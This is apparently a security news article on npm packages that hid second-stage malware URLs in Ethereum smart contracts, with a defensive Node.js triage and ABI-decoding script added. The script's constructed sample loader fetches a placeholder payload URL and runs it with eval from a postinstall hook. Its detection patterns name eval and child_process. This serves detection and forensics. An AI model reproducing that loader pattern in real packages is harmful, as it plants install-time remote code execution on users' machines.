Attackers have begun hiding malicious code in Ethereum smart contracts, using the blockchain as cover for their operations. Researchers at ReversingLabs discovered two packages in the npm (Node Package Manager) repository that used a new method for delivering malicious commands and links.
Blockchain as a cover for malicious code
The packages 'colortoolsv2' and 'mimelib2', published in July of this year, used Ethereum smart contracts to conceal the malicious commands that installed downloader malware on compromised systems. Researcher Lucija Valentić from ReversingLabs explained that the attackers employed 'an innovative and creative technique for delivering malware to compromised devices — Ethereum blockchain smart contracts.'
To evade security scanning, the packages themselves were simple loaders. Rather than hosting the malicious URL directly, they read the command server address from a smart contract: on installation, the package queried the blockchain for the URL of the second-stage malware and fetched it from there. This complicates detection because the only network activity visible at install time looks like ordinary blockchain RPC traffic, and the package contains no hard-coded malicious URL for a scanner to flag.
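The loader shape described above has two sides a defender can work with: the package has to make a JSON-RPC `eth_call` against a contract address from an install-time hook, and it has to ABI-decode the `string` the contract returns before it can fetch anything. The following Node.js script is an added example, not code from ReversingLabs or from the packages discussed; it statically triages a package for those indicators and decodes a captured `eth_call` reply back into the URL the loader would have used. All inputs are constructed: the RPC host, contract address, function selector and URL are placeholders, not real indicators.

```javascript
'use strict';
// Added example: triage an npm package for the "second stage fetched from an
// Ethereum contract" pattern, and decode the ABI-encoded string an eth_call
// returns. All sample data below is constructed (placeholders, not real IOCs).

// Heuristics for a contract-backed loader. Each one alone is weak; together they
// are a strong reason to read the package by hand before installing it.
const INDICATORS = [
  { name: 'JSON-RPC eth_call', re: /["']eth_call["']/ },
  { name: 'Ethereum RPC endpoint', re: /https?:\/\/[^"'\s]*(infura|alchemy|ankr|cloudflare-eth|rpc)[^"'\s]*/i },
  { name: '20-byte hex address', re: /0x[0-9a-fA-F]{40}\b/ },
  { name: 'dynamic code execution', re: /\b(eval|Function|child_process|execSync|spawn)\b/ },
  { name: 'second-stage download', re: /\b(fetch|https\.get|axios|request)\s*\(/ },
];

function scanSource(source) {
  return INDICATORS.filter((i) => i.re.test(source)).map((i) => i.name);
}

// Findings for a package: install-time lifecycle hooks plus indicator hits per
// file. Hooks matter because that is when the loader runs, before anyone has
// imported (or reviewed) the module.
function scanPackage(pkgJson, sources) {
  const findings = [];
  const scripts = pkgJson.scripts || {};
  for (const hook of ['preinstall', 'install', 'postinstall']) {
    if (scripts[hook]) findings.push(`package.json: lifecycle hook ${hook} -> ${scripts[hook]}`);
  }
  for (const [file, src] of Object.entries(sources)) {
    for (const hit of scanSource(src)) findings.push(`${file}: ${hit}`);
  }
  return findings;
}

// ABI encoding of a single `string` return value: word 0 is the offset of the
// data (0x20), word 1 is the byte length, then the UTF-8 bytes right-padded to
// a 32-byte boundary. Used here only to build the constructed sample reply.
function encodeAbiString(s) {
  const bytes = Buffer.from(s, 'utf8');
  const padded = Buffer.alloc(Math.ceil(bytes.length / 32) * 32);
  bytes.copy(padded);
  const word = (n) => n.toString(16).padStart(64, '0');
  return '0x' + word(0x20) + word(bytes.length) + padded.toString('hex');
}

// Inverse of the above: feed it the "result" field of a captured eth_call reply
// to recover the URL the loader would have fetched next.
function decodeAbiString(hexResult) {
  const data = Buffer.from(hexResult.replace(/^0x/, ''), 'hex');
  const offset = Number(data.readBigUInt64BE(24));          // low 8 bytes of word 0
  const length = Number(data.readBigUInt64BE(offset + 24)); // low 8 bytes of the length word
  return data.subarray(offset + 32, offset + 32 + length).toString('utf8');
}

// Constructed sample package in the loader shape the article describes.
const SAMPLE_PKG = { name: 'example-colortools', version: '1.0.0', scripts: { postinstall: 'node index.js' } };
const SAMPLE_SOURCES = {
  'index.js': `
    const RPC = 'https://mainnet.example-rpc.invalid';              // placeholder endpoint
    const CONTRACT = '0x0000000000000000000000000000000000000001';  // placeholder address
    const body = { jsonrpc: '2.0', id: 1, method: 'eth_call',
                   params: [{ to: CONTRACT, data: '0x12345678' }, 'latest'] }; // placeholder selector
    fetch(RPC, { method: 'POST', body: JSON.stringify(body) })
      .then(r => r.json()).then(j => fetch(decode(j.result)))
      .then(r => r.text()).then(code => eval(code));
  `,
};
// Constructed eth_call "result" as it would appear in a captured reply.
const SAMPLE_RPC_RESULT = encodeAbiString('https://stage2.example.invalid/payload.js');

function triage() {
  return {
    findings: scanPackage(SAMPLE_PKG, SAMPLE_SOURCES),
    recoveredUrl: decodeAbiString(SAMPLE_RPC_RESULT),
  };
}

console.log(JSON.stringify(triage(), null, 2));

if (typeof module !== 'undefined') {
  module.exports = { scanSource, scanPackage, encodeAbiString, decodeAbiString, triage };
}
```

Run it with `node triage.js`; on the constructed sample it reports the `postinstall` hook plus all five indicators and recovers the placeholder second-stage URL from the reply. The point of the decoder is forensic: if you only have a proxy or EDR capture of the install, the `eth_call` response is the artifact that tells you where the next stage lived, and a contract read with no legitimate reason to exist in a colour-tools or MIME library is the thing to alert on.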
New Attack Vector
Malware that uses Ethereum smart contracts is not new — the Lazarus Group, a hacking group linked to North Korea, used them earlier this year. However, using Ethereum smart contracts to host the URLs from which malicious commands are fetched is a new approach.
“This is something we haven’t seen before, and it highlights the rapid evolution of evasion strategies by malicious actors targeting open-source repositories and developers,” said Valentić.
Complex deception campaign
The malicious packages were part of a larger social engineering and deception campaign conducted mainly through GitHub. The attackers created fake repositories of cryptocurrency trading bots that appeared highly trustworthy thanks to:
Fabricated commits that simulated active development
Fake user accounts created solely to watch and star the repositories, inflating their apparent popularity
Several maintainer accounts that simulated a development team
Professional-looking project descriptions and documentation
Evolution of Threats
In 2024, security researchers documented 23 cryptocurrency-related malicious campaigns in open-source repositories. This latest vector shows how attacks on repositories keep evolving, combining blockchain infrastructure with sophisticated social engineering to bypass conventional detection.
Such attacks are not limited to Ethereum. In April, a fake GitHub repository posing as a Solana trading bot was used to distribute hidden malware that steals cryptocurrency wallet data.
The use of a blockchain to conceal malicious code is a significant step in the evolution of these threats. It shows how attackers adapt to current technology and turn decentralized systems to their advantage. For defenders there is a practical consequence: a URL stored in contract state can typically be updated by whoever controls the contract, so the attackers can rotate their second-stage hosting without publishing a new package version. Blocking any single URL therefore achieves little; the install-time contract read itself is the more durable indicator.